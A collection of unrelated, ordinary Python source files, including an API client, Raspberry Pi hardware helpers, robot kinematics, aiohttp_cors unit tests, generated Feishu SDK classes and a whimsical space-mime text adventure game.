project=project_id,
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
),
auth_header=get_token_http_auth_header(auth_key),
requests_session=self.requests_session,
request_defaults=self.request_defaults,
)
class SessionAuthClient(object):
"""Session auth client.
You should not initalize this client manually.
Use [Client.auth](#clientauth) method with ``session`` authentication.
"""
def __init__(self,
auth_header,
host,
port,
secure,
requests_session,
request_defaults,
api_base_path):
self.host = host
self.port = port
self.secure = secure
self.requests_session = requests_session
self.request_defaults = request_defaults
self.auth_header = auth_header
self.api_base_path = api_base_path
self.base_uri = get_base_uri(
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
)
resource_kwargs = {
'base_uri': self.base_uri,
'auth_header': auth_header,
'requests_session': requests_session,
'request_defaults': request_defaults
}
self.user = SessionUserResource(**resource_kwargs)
self.projects = ProjectListResource(**resource_kwargs)
self.project = ProjectOneResource(**resource_kwargs)
def use_project(self, project_id):
"""Creates an instance of [ProjectClient](#projectclient),
providing session authentication.
Parameters:
* `project_id` - project identifier.
Returns:
Instance of [ProjectClient](#projectclient) with
session authentication.
Example:
```python
client = Client('deform.io')
session_client = client.auth(
'session',
client.user.login('[email protected]', 'password')
)
session_client.use_project('some-project-id')
```
"""
return ProjectClient(
base_uri=get_base_uri(
project=project_id,
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
),
auth_header=self.auth_header,
requests_session=self.requests_session,
request_defaults=self.request_defaults,
)
class ProjectClient(object):
"""Project client.
You should not initalize this client manually.
Use [Client.auth](#clientauth) method with ``token`` authentication or
[SessionAuthClient.use_project](#sessionauthclientuse_project) method.
"""
def __init__(self,
base_uri,
auth_header,
requests_session,
request_defaults):
resource_kwargs = {
'base_uri': base_uri,
'auth_header': auth_header,
'requests_session': requests_session,
'request_defaults': request_defaults
}
self.base_uri = base_uri
self.auth_header = auth_header
self.request_session = requests_session
self.request_defaults = request_defaults
self.info = CurrentProjectInfoResource(**resource_kwargs)
self.collections = CollectionListResource(**resource_kwargs)
self.collection = CollectionOneResource(**resource_kwargs)
self.documents = DocumentListResource(**resource_kwargs)
self.document = DocumentOneResource(**resource_kwargs)
|
from typing import List
from .action_postprocessor import ActionPostprocessor
from ..actions import Action
class PostprocessorCombiner(ActionPostprocessor):
"""
Combines multiple other postprocessors
"""
def __init__(self, postprocessors: List[ActionPostprocessor]):
self.postprocessors = postprocessors
def postprocess(self, actions: List[Action]) -> List[Action]:
for p in self.postprocessors:
actions = p.postprocess(actions)
return actions
|
# Minimum Height Triangle
# Find the smallest height of a triangle preserving the given constraints.
#
# https://www.hackerrank.com/challenges/lowest-triangle/problem
#
base, area = map(int, input().split())
height = (2 * area - 1) // base + 1
print(height)
|
#!/usr/bin/env python
#
# This is the library for Grove Base Hat.
#
# Helper Classes
#
'''
## License
The MIT License (MIT)
Grove Base Hat for the Raspberry Pi, used to connect grove sensors.
Copyright (C) 2018 Seeed Technology Co.,Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
from __future__ import print_function
from grove.adc import *
import time
import sys
import os
import re
_SlotsGPIORpi = { 5:"D5", 12:"PWM", 16:"D16", 18:"D18", 22:"D22", 24:"D24", 26:"D26" }
_SlotsGPIORpiZero = { 5:"D5", 12:"PWM", 16:"D16" }
_SlotsADCRpi = { 0:"A0", 2:"A2", 4:"A4", 6:"A6" }
_SlotsADCRpiZero = { 0:"A0", 2:"A2", 4:"A4" }
_SlotsPWMRpi = { 12:"PWM", 18:"D18" }
_SlotsPWMRpiZero = { 12:"PWM" }
_SlotsNull = { }
class SlotHelper(object):
# Slot types
GPIO = 0
ADC = 1
PWM = 2
I2C = 3
UART = 4
def __init__(self, slot):
adc = ADC()
name = adc.name
print("Hat Name = '{}'".format(name))
if name == RPI_ZERO_HAT_NAME:
self.__hat_type = RPI_ZERO_HAT_PID
self.__slots_gpio = _SlotsGPIORpiZero
self.__slots_adc = _SlotsADCRpiZero
self.__slots_pwm = _SlotsPWMRpiZero
elif name != RPI_HAT_NAME:
print("Unknown hat, assume {}".format(RPI_HAT_NAME))
if name != RPI_ZERO_HAT_NAME:
self.__hat_type = RPI_HAT_PID
self.__slots_gpio = _SlotsGPIORpi
self.__slots_adc = _SlotsADCRpi
self.__slots_pwm = _SlotsPWMRpi
self.__slots_i2c = _SlotsNull
maps = { \
SlotHelper.GPIO:self.__slots_gpio, \
SlotHelper.ADC :self.__slots_adc, \
SlotHelper.PWM :self.__slots_pwm, \
SlotHelper.I2C :self.__slots_i2c, \
}
self._slots = maps.get(slot)
self._slot = slot
def is_adapted(self, pin):
if not self._slots:
return False
if not pin in self._slots.keys():
return False
return True
def list_avail(self):
if not self._slots:
return
maps = { \
SlotHelper.GPIO: "GPIO", \
SlotHelper.ADC : "ADC", \
SlotHelper.PWM : "PWM", \
SlotHelper.I2C : "I2C", \
}
print(" <pin> could be one of below values")
print(" in the pin column for {} function".format(maps.get(self._slot)))
print(" And connect the device to corresponding slot")
print("==============")
print(" pin | slot")
print("==============")
for pin, slot in self._slots.items():
print('{:^5}|{:^5} '.format(pin, slot))
def argv2pin(self, extra=''):
if len(sys.argv) < 2:
usage = 'Usage: {} <pin>'.format(sys.argv[0])
usage += extra
print(usage)
self.list_avail()
sys.exit(1)
pin = int(sys.argv[1])
if not self.is_adapted(pin):
self.list_avail()
sys.exit(1)
return pin
def root_check():
if os.geteuid() != 0:
print("This program must be run as root.")
print("sudo required for non-root user, Aborting.")
sys.exit(1)
def __module_installed(name):
for line in os.popen("lsmod"):
match = re.match("^" + name + " *", line)
if match is None: continue
# print("result = {}".format(match))
return True
return False
def module_install(name, param):
if __module_installed(name):
return True
os.system("modprobe " + name + " " + param)
for _ in range(20):
if __module_installed(name):
return True
time.sleep(0.2)
return False
class OverlayHelper(object):
def __init__(self, dev_path, overlay, param):
self._path = dev_path
self._ovlay = overlay
self._param = param
def __is_dt_inst(self):
for line in os.popen("dtoverlay -l"):
# lines likes
#2: w1-gpio gpiopin=5
match = re.match("^[0-9]+: *" + self._ovlay + " +", line)
if match is None: continue
return True
return False
def is_installed(self):
if os.path.exists(self._path):
return True
if self.__is_dt_inst():
return True
return False
def install(self):
if self.is_installed():
return True
os.system("dtoverlay " + self._ovlay + " " + self._param)
for _ in range(20):
if self.is_installed():
return True
time.sleep(0.2)
return False
def __str__(self):
return "Overlay {} installed = {}".format(
self._ovlay, self.is_installed())
# __repr__ = __str__
@property
def name(self):
return self._ovlay
if __name__ == '__main__':
print("module w1_therm installed: {}"
.format(__module_installed("w1_therm")))
module_install("w1_therm", "")
print("module w1_therm installed: {}"
.format(__module_installed("w1_therm")))
print("module w1_gpio installed: {}"
.format(__module_installed("w1_gpio")))
oh = OverlayHelper("/sys/devices/w1_bus_master1",
"w1-gpio",
"gpiopin=5")
print(oh)
print("install {} ...".format(oh.name))
oh.install()
print(oh)
|
#!/usr/bin/python
from axis_fifo import AXIS_FIFO
from devices import fifo_devices
import struct
def writeToDDS(dds_char_dev, address, data):
data_bytes = struct.pack('<I', data)
words = []
#instruction and D16-D31
words.append(data_bytes[2])
words.append(data_bytes[3])
words.append(struct.pack('<B', address + 128))
words.append("\x00")
#IOU and D0-D15
words.append(data_bytes[0])
words.append(data_bytes[1])
words.append(struct.pack('<B', 192 + 1))
words.append("\x00")
for word in words:
dds_char_dev.write(word)
if __name__ == "__main__":
# device = fifo_devices['AD9959_0']
# fifo = AXIS_FIFO(device)
# fifo.write_axis_fifo("\x00\x86\x28\xF5") #(76.45 MHZ: 0x271DE698) (80 MHz: 0x28F5C378)
# fifo.write_axis_fifo("\x00\xC1\xC3\x78")
with open("/dev/axis_fifo_0x0000000080005000", "r+b") as character:
# ~ writeWords(character)
writeToDDS(character,6,0x00011100) #
|
import pandas
import os
from desafio_iafront.data.saving import save_partitioned
def save_clustered_data(dataset:pandas.DataFrame, saida:str):
date_first = os.path.join(saida, 'date_first')
cluster_first = os.path.join(saida, 'cluster_first')
save_partitioned(dataset, date_first, ['data', 'hora', 'cluster_label'])
save_partitioned(dataset, cluster_first, ['cluster_label', 'data', 'hora']) |
import math
import numpy as np
# Converts URx's rotation vector into a rotation matrix
#
# I did not derive this nor do I fully understand the maths behind this :0
# I took it from: https://dof.robotiq.com/discussion/1648/around-which-axes-are-the-rotation-vector-angles-defined
def convert_tool_pose_to_transformation_matrix(tool_pose):
r = tool_pose[3:]
rx = r[0]
ry = r[1]
rz = r[2]
theta = math.sqrt( (rx ** 2) + (ry ** 2) + (rz ** 2) )
ux = rx / theta
uy = ry / theta
uz = rz / theta
c = math.cos(theta)
s = math.sin(theta)
C = 1 - c
# base_to_tcp = np.array([0, -600, -135])
base_to_tcp = tool_pose[:3]
T = np.array([
[(ux * ux * C) + c , (ux * uy * C) - (uz * s), (ux * uz * C) + (uy * s), base_to_tcp[0]],
[(uy * ux * C) + (uz * s), (uy * uy * C) + c , (uy * uz * C) - (ux * s), base_to_tcp[1]],
[(uz * ux * C) - (uy * s), (uz * uy * C) + (ux * s), (uz * uz * C) + c , base_to_tcp[2]],
[0,0,0,1]
])
return T
# Calculates hand position in absolute coordinates
def calculate_hand_position(transformation_matrix, relative_palm_postion):
# Formats raw hand coordinates
hand_coordinates_raw = relative_palm_postion
hand_coordinates_raw = [50, 0, 0]
hand_coordinates_raw.append(1)
hand_coordinates = np.array(hand_coordinates_raw) * [1, -1, 1, 1]
# Gets abolsolute matrix by transformation matrix multiplication
absolute_position = transformation_matrix.dot(hand_coordinates)
return np.round(absolute_position[:3],3)
def calculate_required_robot_position(absolute_hand_position, y_offset=0):
required_robot_position = absolute_hand_position + [0, 130, 0]
# required_robot_position = absolute_hand_position + y_offset
return required_robot_position
def main():
tool_pose = [50, -600, -135, 0, 3.14, 0]
T = convert_tool_pose_to_transformation_matrix(tool_pose)
relative_palm_postion = [0, 103, 0]
absolute_hand_position = calculate_hand_position(T, relative_palm_postion)
print(absolute_hand_position)
required_robot_position = calculate_required_robot_position(absolute_hand_position)
print(required_robot_position)
main()
|
""" Create a python file that collects the necessary information and prints json:
```python
#! /usr/bin/env python
from exdoc import doc
import json
from project import User
print json.dumps({
'user': doc(User),
})
```
And then use its output:
```console
./collect.py | j2 --format=json README.md.j2
```
"""
from .py import doc, getmembers, subclasses
|
"""Wrap the sklearn.linear_model ridge classification model."""
from model_base import ClassificationModelBase
from sklearn.linear_model import RidgeClassifier
class RidgeClassifierModel(ClassificationModelBase):
def __init__(self, model_conf):
model = RidgeClassifier()
super().__init__(model_conf, model)
def get_params(self):
parameters = {}
parameters['alpha'] = self.fetch_parameter('alpha', float, True)
parameters['tol'] = self.fetch_parameter('tol', float, True)
parameters['solver'] = self.fetch_parameter('solver', str, True)
parameters['max_iter'] = self.fetch_parameter('max_iter', int, True)
return parameters
|
# Copyright 2015 Vladimir Rutsky <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""aiohttp_cors.cors_config unit tests.
"""
import asyncio
import pytest
from aiohttp import web
from aiohttp_cors import CorsConfig, ResourceOptions, CorsViewMixin
async def _handler(request):
return web.Response(text="Done")
class _View(web.View, CorsViewMixin):
@asyncio.coroutine
def get(self):
return web.Response(text="Done")
@pytest.fixture
def app():
return web.Application()
@pytest.fixture
def cors(app):
return CorsConfig(app, defaults={
"*": ResourceOptions()
})
@pytest.fixture
def get_route(app):
return app.router.add_route(
"GET", "/get_path", _handler)
@pytest.fixture
def options_route(app):
return app.router.add_route(
"OPTIONS", "/options_path", _handler)
def test_add_options_route(app, cors, options_route):
"""Test configuring OPTIONS route"""
with pytest.raises(ValueError,
match="already has OPTIONS handler"):
cors.add(options_route.resource)
def test_plain_named_route(app, cors):
"""Test adding plain named route."""
# Adding CORS routes should not introduce new named routes.
assert len(app.router.keys()) == 0
route = app.router.add_route(
"GET", "/{name}", _handler, name="dynamic_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_dynamic_named_route(app, cors):
"""Test adding dynamic named route."""
assert len(app.router.keys()) == 0
route = app.router.add_route(
"GET", "/{name}", _handler, name="dynamic_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_static_named_route(app, cors):
"""Test adding dynamic named route."""
assert len(app.router.keys()) == 0
route = app.router.add_static(
"/file", "/", name="dynamic_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_static_resource(app, cors):
"""Test adding static resource."""
assert len(app.router.keys()) == 0
app.router.add_static(
"/file", "/", name="dynamic_named_route")
assert len(app.router.keys()) == 1
for resource in list(app.router.resources()):
if isinstance(resource, web.StaticResource):
cors.add(resource)
assert len(app.router.keys()) == 1
def test_web_view_resource(app, cors):
"""Test adding resource with web.View as handler"""
assert len(app.router.keys()) == 0
route = app.router.add_route(
"GET", "/{name}", _View, name="dynamic_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_web_view_warning(app, cors):
"""Test adding resource with web.View as handler"""
route = app.router.add_route("*", "/", _View)
with pytest.warns(DeprecationWarning):
cors.add(route, webview=True)
def test_disable_bare_view(app, cors):
class View(web.View):
pass
route = app.router.add_route("*", "/", View)
with pytest.raises(ValueError):
cors.add(route)
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
from pylark.lark_request import RawRequestReq, _new_method_option
from pylark import lark_type, lark_type_sheet, lark_type_approval
import attr
import typing
import io
@attr.s
class CopyDriveFileReq(object):
file_token: str = attr.ib(
default="", metadata={"req_type": "path", "key": "fileToken"}
) # 需要复制的源文件或文档的 token, 获取方式见 [概述](https://open.feishu.cn/document/ukTMukTMukTM/uUDN04SN0QjL1QDN/files/guide/introduction)
type: str = attr.ib(
default="", metadata={"req_type": "json", "key": "type"}
) # 需要创建文档的类型 "doc" 、"sheet" or "bitable"
dst_folder_token: str = attr.ib(
default="", metadata={"req_type": "json", "key": "dstFolderToken"}
) # 目标文件夹的 token, 获取方式见 [概述](https://open.feishu.cn/document/ukTMukTMukTM/uUDN04SN0QjL1QDN/files/guide/introduction)
dst_name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "dstName"}
) # 复制的副本文件的新名称
comment_needed: bool = attr.ib(
default=None, metadata={"req_type": "json", "key": "commentNeeded"}
) # 是否复制评论
@attr.s
class CopyDriveFileResp(object):
folder_token: str = attr.ib(
default="", metadata={"req_type": "json", "key": "folderToken"}
) # 目标文件夹的 token
revision: int = attr.ib(
default=0, metadata={"req_type": "json", "key": "revision"}
) # 新创建文档的版本号
token: str = attr.ib(
default="", metadata={"req_type": "json", "key": "token"}
) # 新创建文档的 token
type: str = attr.ib(
default="", metadata={"req_type": "json", "key": "type"}
) # 新建文档的类型,"doc" or "sheet"
url: str = attr.ib(
default="", metadata={"req_type": "json", "key": "url"}
) # 新创建文档的 url
def _gen_copy_drive_file_req(request, options) -> RawRequestReq:
return RawRequestReq(
dataclass=CopyDriveFileResp,
scope="Drive",
api="CopyDriveFile",
method="POST",
url="https://open.feishu.cn/open-apis/drive/explorer/v2/file/copy/files/:fileToken",
body=request,
method_option=_new_method_option(options),
need_tenant_access_token=True,
need_user_access_token=True,
)
|
from time import sleep
import random
from os import system, name
import urllib.request
import json
item = []
money = 0
print('''
_____ ____ ____ __ ___ ______ ____ ____ ____ _
/ ___/| \ / | / ] / _] | || \ / || || |
( \_ | o ) o | / / / [_ | || D )| o | | | | |
\__ || _/| |/ / | _] |_| |_|| / | | | | | |___
/ \ || | | _ / \_ | [_ | | | \ | _ | | | | |
\ || | | | \ || | | | | . \| | | | | | |
\___||__| |__|__|\____||_____| |__| |__|\_||__|__||____||_____|
''')
def intro(item,money):
print("One day, Isabel was tired of being a silent space and time travelling mime.")
sleep(2)
print("So, she went for a walk, out on the space platform, on star station Old Victoria,")
sleep(2)
print("and while walking, and floating down the space platform,")
sleep(2)
print("she found a newspaper! A real, old Earth, newspaper! Oh my, tut tut and chip chip doodle!")
sleep(3)
print("The newspaper looks old and magical, do you want to take it?\n")
print("You can also play trivia by pressing [t]")
choice = input("Do you take thy newspaper to readth with thine eyes? y/n ")
sleep(2)
if choice == 'y':
print("You take the newspaper and stick it in your space sachel\n")
item.append("newspaper")
sleep(2)
elif choice == 't':
trivia(item,money)
else:
print("You decide its best not to take that old Earth rag and keep on walking by\n")
item.append("nothing")
sleep(2)
sam(item, money)
def sam(item,money):
print("You are stopped by a space cop, who asks what you have in your sachel")
sleep(2)
print("You open the sachel to show the space cop you have a whole lot of",item[0],"\n")
sleep(2)
if item[0] == 'newspaper':
print("The Space Cop, who's name is Sam, wants to buy the newspaper for 500 space credits")
sleep(2)
print(f"For your information, one space credit is 620 human dollars, which gives you ${500*620}\n")
sleep(2)
choice = input("Do you want to sell your newspaper to Sam? y/n ")
if choice == 'y':
print("You sell Sam the newspaper")
money += 500
item[0] = 'nothing'
else:
print("you dont sell the paper and Sam walks away dejected.\n")
sleep(2)
print("You wonder why someone would pay so much for something so ordinary\n")
sleep(2)
print("You look in your space sachel, and now have a whole lot of",item[0])
sleep(2)
print(f"Checking your bank account at Zegumungs, you have {money} space credits\n")
sleep(3)
else:
print("The Space Cop sighs and keeps walking")
sleep(10)
clear()
print("\n\n")
clear()
spacies(item, money)
def spacies(item,money):
print('''
___
| | |
/ \ | | Welcome to Spacies, the Macys of Space
|--o|===|-|
|---| |d|
/ \ |w| How can I help on this spacy afternoon?
| U | |b|
| S |=| |
| A | | | You can buy four things here
|_______| |_| 1. Space Bob Ross wigs - 250 SC
|@| |@| | | 2. Zero gravity carrots - 10 SC
___________|_|_ 3. One small package of gravity (1G) - 1 SC
4. A talking space potato - 1.5 SC
''')
print("\n\n")
choice = input("What do you want to buy? 0 to quit ")
choice = int(choice)
if choice == 1:
if money > 250:
sleep(2)
print("You buy the best wig on the space station")
sleep(2)
print("While you dont like it, you want to keep your friends, and stay a fashion icon")
item.append("bob ross wig")
money -= 250
sleep(2)
print(f'You now have {item[1]} and {money} space credits, which is ${money*620}')
sleep(2)
else:
print("You cant buy anything, youre broke")
elif (choice == 2) and (money > 0):
print("You buy a package of zero gravity carrots")
sleep(2)
print("Space carrots are hard to eat in zero gravity, but you manage")
sleep(2)
print("It seems to all work out, even though there are now but of orange floating around the station")
sleep(2)
print("Refreshed by the delicous snack, you continue on your adventure")
money -= 10
print(f'You now have {item[1]} and {money} space credits, which is ${money*620}')
sleep(2)
elif (choice == 3) and (money > 0):
print("You buy a small package of gravity")
sleep(2)
print("You feel slightly heavier, the gravity seems to be working")
sleep(2)
print("Gravity will help with your mime abilities, but you may need more to time travel")
sleep(2)
print("Dimensional travel is possible though... you may consider it...")
money -= 1
print(f'You now have {item[1]} and {money} space credits, which is ${money*620}')
sleep(2)
elif (choice == 4) and (money > 0):
print("You buy a talking space potato")
sleep(2)
print("His name is Bill, and he is a potato. He is very annoying and screams all the time")
sleep(2)
print("You scream things like 'Do you want to be a baked potato?' and 'Quiet or I mash you'")
sleep(2)
print("But it does not seem to help and the screaming continues ")
money -= 1.5
print(f'You now have {item[1]} and {money} space credits, which is ${money*620}')
sleep(2)
else:
print("You decide not to buy anything")
option = input("Do you want to buy anything else?")
if option == 'y':
spacies(item,money)
option = input('You see a mime room, do you want to enter it?')
if option == 'y':
mime(item,money)
else:
dimensional(item,money)
print("\n\n")
sleep(4)
def dimensional(item,money):
print('''
You approach a big sign that says:
Welcome to the dimensional portal - fun to teleport to other dimensions
There is also a small sign that says "Caution: Some Danger may Apply"
. + . . . . . .
. . . *
. * . . . . . . + .
"You Are Here" . . + . . .
. | . . . . . .
| . . . +. + .
\|/ . . . .
. . V . * . . . . + .
+ . . . +
. . + .+. .
. . . + . . . . .
. . . . . . . . ! /
* . . . + . . - O -
. . . + . . * . . / |
. + . . . .. + .
. . . . * . * . +.. . *
. . . . . . . . + . . +
''')
sleep(2)
print("Would you like to use the dimensional transporter?")
sleep(2)
choice = input(f"The transporter costs 1 SC ($620). Are you interested? y/n ")
if choice == 'y':
if money > 0:
print("you decide to try the transporter")
sleep(2)
else:
print("you dont have any money, but they do need mimes on Zergalon Alpha")
sleep(2)
print("they let you get on the transporter")
sleep(2)
else:
print("While you dont want to go, it seems like you are forced to anyways")
sleep(2)
zerg(item, money)
def zerg(item,money):
print("You step on the transporter, and you are zapped to another dimension")
print('''
____ _ _ _ _
|_ /___ _ _ __ _ __ _| |___ _ _ /_\ | |_ __| |_ __ _
/ // -_) '_/ _` / _` | / _ \ ' \ / _ \| | '_ \ ' \/ _` |
/___\___|_| \__, \__,_|_\___/_||_| /_/ \_\_| .__/_||_\__,_|
__ __|___/ __ |_| _
\ \ / /__| |__ ___ _ __ ___ ___ \ \ / /__ _ _| |
\ \/\/ / -_) / _/ _ \ ' \/ -_|_-< \ V / _ \ || |_|
\_/\_/\___|_\__\___/_|_|_\___/__/ |_|\___/\_,_(_)
''')
def mime(item,money):
print("You enter the mime room, look around, and see cupcakes.\n'Tis surprising. They are mint toothpaste. \nYou shudder in disgust, you have a strange feeling you might not like mint toothpaste.")
sleep(2)
choice = input("Would you like to buy a disgusting minttoothpaste cupcake? ")
if (choice == 'y') and (money > 0):
print("You buy a cupcake and do not enjoy it because it is mint toothpaste. Mint Toothpaste tastes like mosquitos.")
else:
print("You dont have any money to buy the mint toothpaste cupcake.")
spacies(item, money)
def clear():
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def nothing_room(item, money):
print("You walk through a plain white door in a mysterious and extremely dark hallway. You're not even sure it was white.")
sleep(2)
print("You are in a very dark room with nothing. LITERALLY nothing.")
sleep(2)
print("Or are youuuuu?")
sleep(2)
print("a creepy guy comes out.")
sleep(2)
print("he says 'hello, human.'And you are just confused because you are obviously a space and time traveling mime.")
sleep(2)
print("he says 'Would you like a vegetable?' You can now see that he is blind.")
sleep(2)
print("He magicly pulls out a variety of vegetables.")
sleep(2)
choice = input("Would you like a vegetable? They are magic and will grow in your stomach. y/n ")
if (choice == 'y') and (money > 0):
print("You snatch a vegetable and realize you do not have to pay for it because he is old and blind and will not notice you took a his purple carrot. You know this is mean of you, but you enjoy purple carrots.")
sleep (2)
print("You flee the room swiftly, and once you're out of the old man's earshot, you take a bite out of your purple carrot.")
sleep(2)
print("You hate it. It's mint toothpaste! How dare that WITCH...")
sleep(2)
print("You've been fooled. Tricked. And quite possibly, bamboozled.")
sleep(2)
else:
print("You don't want a vegetable. They might be mint toothpaste and you don't want to waste any money.")
sleep(2)
print("You walk out of the room sighing and saying 'Nah.'")
def learning(item,money):
print("You enter the learning rooms. After looking around you find a spellbook on the floor. ")
sleep(2)
choice = input("Would you like to pick it up? ")
if (choice == 'y') :
print("You attempt to pick up the book, but to pick up the book you must achieve a 15 for luck roll")
else:
print("You leave the book on the floor")
input("Press enter to roll")
d20 = random.randint(1,20)
print(d20)
if d20 > 14:
print("You take the book, putting it into your satchel unscaved")
else:
print("The book vanishes in your hands, never being seen again")
spacies(item, money)
def chicken(item,money):
pause(2)
print("You drive over in your fancy space car to McSpacedonalds.")
choice = input("Would you like to buy [a] a Space Mac or [b] a Buttermilk Space chicken sandwich")
order_name = input("What is the name of the order")
if choice == "a":
print("Yeet")
def dog(item,money):
print("You enter the dog room, when you look around there are a few things that you see, you see a mean lookin chicken, and a few dogs in cages! One is a cute french bulldog")
sleep(2)
choice = input("Would you like to buy the cute frenchie?? ")
if (choice == 'y') and (money > 0):
print("You buy the frenchy and it bites the chickens head off as you walk past.")
else:
print("Why dont you have any money???")
spacies(item, money)
def spacefarm(item,money):
print("You find yourself in a room full of cows, pigs, sheep and goats.")
sleep(2)
print("The smell is terrible, but you don't notice very much because you've been stuck with gross people on the same space station for months.")
sleep(2)
print("As you make your way through the room, you notice a little goat eating hay in the corner.")
choice = input("Would you like to steal the goat? He is VERY cute...")
if (choice == 'y') and (money > 0):
print("You stuff the goat in your backpack and make a run for it.")
else:
print("You probably don't want a goat anyway. They make funny noises and eat furniture.")
spacies(item, money)
def fight(item,money):
print("You enter the fighting room, you see there are all kinds of swords\n but only one seems to get your attention,\n it is all steel with a red handle.")
sleep(2)
print("you go up to examine the sword and the cool metal makes you feel alive.")
sleep(2)
choice = input("Would you like to buy the sword for 50 space credits?")
if (choice == 'y') and (money > 49):
money -= 50
print("You buy the sword and and leave the room thinking that if you get attacked you can fight back")
else:
print("You decide that having a sword around will draw suspicion to you so leave the room empty handed.")
spacies(item, money)
def kill(item,money):
print("You see a man who has just beaten up an elderly woman, do you either hit A, and kill the man, or do you quietly tell him to stop")
choice = input("What do you choose? ")
if choice == "A":
print("the man sees you and shoots you with a BRWD, a bob ross wig dart and you fall to the groud wounded")
else:
print("the man gets scared and drops the purse, you seethe money in it and decide to either A, try to find the woman, or B, and greedily steal it for your self ")
choice = input("What do you choose? ")
if choice == "C":
print("you cant find the woman, so you decide to go to Spacies to try to find the women")
else:
print(" A space cop sees you and hauld you off t0 mime prison")
spacies(item, money)
def bank(item,money):
print("Welcome to Zegumungs")
sleep(2)
print("Banking for the Stars since Decalon Beta was Decalon Alpha!")
sleep(2)
office()
while True:
print(''' Welcome to Zegumungs!
This is what you can do at the bank:
0. Check your bank balance
1. Deposit Space Credits
2. Withdrawl Space Credits
3. Rob the bank
4. Buy the bank
''')
choice = input("Please pick an option")
if choice == '1':
print("You deicde to deposit SC")
elif choice == '0':
print("You check your bank balance")
elif choice == '2':
print("You deicde to withdrawl SC")
elif choice == '3':
print("You deicde to rob the bank")
elif choice == '4':
print("You deicde to buy the bank")
print("The bank costs 10,000,000 SC, which is $",10_000_000 * 620)
print("The bank asks you to make an offer for how much you want to pay")
choice = input("How much do you offer to buy the bank?")
choice = int(choice)
if choice < random.randint(8_000_000,10_000_000):
print("You are now the owner of the bank!")
else:
print("You do not buy the bank")
else:
print("Please pick a valid option")
def office(item,money):
print('''
__________________________________________
|.'', Welcome to the Bank ,''.|
|.'.'', ,''.'.|
|.'.'.'', ,''.'.'.|
|.'.'.'.'', ,''.'.'.'.|
|.'.'.'.'.| |.'.'.'.'.|
|.'.'.'.'.|===; ;===|.'.'.'.'.|
|.'.'.'.'.|:::|', ,'|:::|.'.'.'.'.|
|.'.'.'.'.|---|'.|, _______ ,|.'|---|.'.'.'.'.|
|.'.'.'.'.|:::|'.|'|???????|'|.'|:::|.'.'.'.'.|
|,',',',',|---|',|'|???????|'|,'|---|,',',',',|
|.'.'.'.'.|:::|'.|'|???????|'|.'|:::|.'.'.'.'.|
|.'.'.'.'.|---|',' /%%%\ ','|---|.'.'.'.'.|
|.'.'.'.'.|===:' /%%%%%\ ':===|.'.'.'.'.|
|.'.'.'.'.|%%%%%%%%%%%%%%%%%%%%%%%%%|.'.'.'.'.|
|.'.'.'.',' /%%%%%%%%%\ ','.'.'.'.|
|.'.'.',' /%%%%%%%%%%%\ ','.'.'.|
|.'.',' /%%%%%%%%%%%%%\ ','.'.|
|.',' /%%%%%%%%%%%%%%%\ ','.|
|;____________/%%%%%Spicer%%%%%%\____________;|
''')
def perform(item, money):
print("You go to a fancy party hall and perform your mime routine for")
print("the many assembeled guests")
def training(item, money):
print("'See us next week, and see if you are prepared for your lightsaber, we shall.'")
print("You enter a room with a sign above it stating 'FREE CUPCAKES'. You see Baby Yoda.. he walks up to you")
sleep(2)
print("'Train you to be a Jedi like E.T., I shall.' He says.")
sleep(2)
choice = input("Do you accept your training? Y or N.")
if choice == 'N':
print("E.T. is dissapointed. He thinks you may be a Sith. He jumps up from behind you and stabs you in the back with his orange lightsaber.")
sleep(2)
print("The medics come and E.T. claims he has nothing to do with your injury.")
sleep(2)
print("You are unconscious, but the medics frown and quickly put a fast-working healing serum on your wound.")
sleep(2)
print("E.T. and Baby Yoda high-five after the medics have dragged you out of the room ona stretcher. Another potential Sith defeated.")
else:
print("Baby Yoda happily smiles at you, an you can see E.T. in the dark hallway ahead nodding.")
sleep(2)
print("Baby Yoda leads you down the dark hallway, and E.T. joins him.")
sleep(2)
print("Baby Yoda looks up at you and says 'Now, your training begins, young Padawan.'")
sleep(2)
print("Young? YOUNG? you are obviously centuries old, as any space and time traveling mime is!")
sleep(2)
print("And Padawan? Pffttttt! What was this? the 347th century? You are a glorious bell, as your name states.")
sleep(2)
print("You should, quite obviously, be called and referred to as 'Master Mime', for that is who you are.")
sleep(2)
print("Only your closest friends could ever call you Isabel. Padawan? Why, you are so much more!")
sleep(2)
print("You roll your eyes and sigh.")
sleep(2)
print("E.T. complains to Baby Yoda in an entirely different language. One of the few languages unfamiliar to you.")
sleep(2)
